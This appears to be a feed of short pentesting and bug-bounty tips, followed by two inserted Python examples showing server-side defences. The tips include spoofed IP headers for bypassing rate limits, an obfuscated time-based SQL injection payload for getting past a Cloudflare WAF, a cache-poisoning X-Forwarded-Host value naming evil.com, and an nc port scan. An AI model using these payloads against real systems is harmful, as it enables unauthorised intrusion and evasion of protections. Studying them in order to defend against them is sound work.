Quick Port Scan Without Nmap
nc -zv abc.com 1-1000
Useful when Nmap is blocked.
Lightweight ≠ useless.
#Pentesting #Networking #HacklidoTips
Bypassing Rate Limit Protection
Add these headers to your request [through Burp Suite]:
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
#BugBounty #WebSecurity #HacklidoTips
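Why these headers work, and the server-side fix, as an added example that is not part of the original post: a rate limiter that keys on whatever address header the request carries can be steered by the client, while one that keys on the socket peer (and reads X-Forwarded-For only from its own proxies) cannot. The proxy range, the loopback exemption, the sample addresses and all function names are assumptions, and the proxies are assumed to append the connecting address to X-Forwarded-For.

```python
import ipaddress

# Assumptions (constructed values): our reverse proxies live in 10.0.0.0/8, and the
# limiter exempts loopback, which is what makes a spoofed 127.0.0.1 worth sending.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]
EXEMPT = {"127.0.0.1"}
# Client-controlled address headers from the list above (names lowercased).
FORWARDING_HEADERS = ("x-originating-ip", "x-forwarded-for", "x-remote-ip",
                      "x-remote-addr", "x-client-ip")

def naive_client_ip(peer_ip, headers):
    """Weak pattern: believe whichever forwarding header the request carries."""
    for name in FORWARDING_HEADERS:
        if name in headers:
            return headers[name].split(",")[0].strip()
    return peer_ip

def is_trusted(ip):
    addr = ipaddress.ip_address(ip)  # raises ValueError on malformed input
    return any(addr in net for net in TRUSTED_PROXIES)

def client_ip(peer_ip, headers):
    """Hardened: use the socket peer unless that peer is one of our proxies."""
    if not is_trusted(peer_ip):
        return peer_ip  # direct connection: every forwarding header is ignored
    hops = [h.strip() for h in headers.get("x-forwarded-for", "").split(",")]
    # Walk right to left: the rightmost entries were appended by our own proxies.
    for hop in reversed(hops):
        try:
            if not is_trusted(hop):
                return hop
        except ValueError:
            break  # malformed entry: stop trusting the chain
    return peer_ip

def decisions(resolver, requests, limit=3):
    """Fixed-window limiter: one allow/deny result per request."""
    counts, out = {}, []
    for peer_ip, headers in requests:
        key = resolver(peer_ip, headers)
        counts[key] = counts.get(key, 0) + 1
        out.append(key in EXEMPT or counts[key] <= limit)
    return out

# Constructed traffic: five requests from 203.0.113.7 through proxy 10.0.0.5.
SAMPLE = [("10.0.0.5", {"x-forwarded-for": "127.0.0.1, 203.0.113.7",
                        "x-client-ip": "127.0.0.1"})] * 5
```

With the naive resolver all five sample requests pass; with the hardened one the fourth and fifth are denied.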
Breach Data Check websites
1. Have I Been Pwned [haveibeenpwned.com]
2. Firefox Monitor [monitor.mozilla.org]
3. Data Breach [databreach.com]
4. LeakCheck [leakcheck.io]
5. Quick Heal Data Breach Checker [https://www.quickheal.co.in/data-breach-checker]
#DataLeaks #Cybersecurity #HacklidoTips #Hacklido
AI SECURITY ROADMAP
Stage 1 : Foundational Principles and Governance
Stage 2 : Threat Modeling and Risk Assessment
Stage 3 : Secure AI Development
Stage 4 : Secure Deployment and Monitoring
Stage 5 : Incident Response and Forensics
Stage 6 : Advanced Security and Future Trends
#AISecurity #AIRoadmap #Roadmap #Hacklido #HacklidoTips
Agentic SOCs Explained | The Future of Security Operations
https://www.youtube.com/watch?v=ZxQLbagvyOI
Complete Agentic SOC Roadmap:
https://hacklido.com/blog/1355-agentic-soc-roadmap-from-beginner-to-advanced
In this video, we explain what Agentic SOCs are, how they work, and why they represent the future of Security Operations Centers (SOC).
An Agentic SOC uses AI agents and automation to assist SOC analysts with alert triage, investigation, threat hunting,…
How I track the latest CVEs: top 20, fast
curl -s 'https://cvedb.shodan.io/cves' \
| jq -r '.cves[:20][]?.cve_id'
Want id + summary?
curl -s 'https://cvedb.shodan.io/cves' \
| jq '[.cves
| sort_by(.published? // .Published? // .modified? // "1970-01-01")
| reverse
| .[:20][]? | {cve_id, summary}]'
Tool: cvedb.shodan.io
Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
Blocked Payload
(select(0)from(select(sleep(10)))v) → 403 Forbidden
Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
CACHE POISONING QUICK WIN:
Most apps validate X-Forwarded-Host as a single value.
But try this:
X-Forwarded-Host: http://legit.com, http://evil.com
• CDN: Reads first → Allows
• App: Reads last → Injects
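The parser disagreement described above, and a validator that removes it, as an added example that is not part of the original post: the header is accepted only when it is a single bare hostname on an allowlist, so a list is rejected outright and no layer gets to choose an element. The allowlist, the regular expression and the function names are assumptions made for this sketch.

```python
import re

ALLOWED_HOSTS = {"legit.com"}  # constructed allowlist for this sketch
# Bare hostname with optional port: no scheme, path, whitespace or comma.
HOST_RE = re.compile(r"[a-z0-9]([a-z0-9.-]{0,251}[a-z0-9])?(:\d{1,5})?")


def first_value(raw):
    """What the post says the CDN checks."""
    return raw.split(",")[0].strip()


def last_value(raw):
    """What the post says the application uses."""
    return raw.split(",")[-1].strip()


def validate_forwarded_host(lines):
    """lines: every X-Forwarded-Host header line on the request, as received.

    Returns the allowlisted host, or None so the caller falls back to its
    configured canonical host instead of reflecting request data.
    """
    if len(lines) != 1:
        return None            # header repeated: same ambiguity as a comma list
    raw = lines[0].strip().lower()
    if not HOST_RE.fullmatch(raw):
        return None            # list, scheme or junk: never pick one element
    host = raw.rsplit(":", 1)[0] if ":" in raw else raw
    return host if host in ALLOWED_HOSTS else None


# Constructed input: the header value from the post.
SAMPLE = "http://legit.com, http://evil.com"
```

Running the same validator at the edge and in the application keeps the two layers from reaching different conclusions about one request.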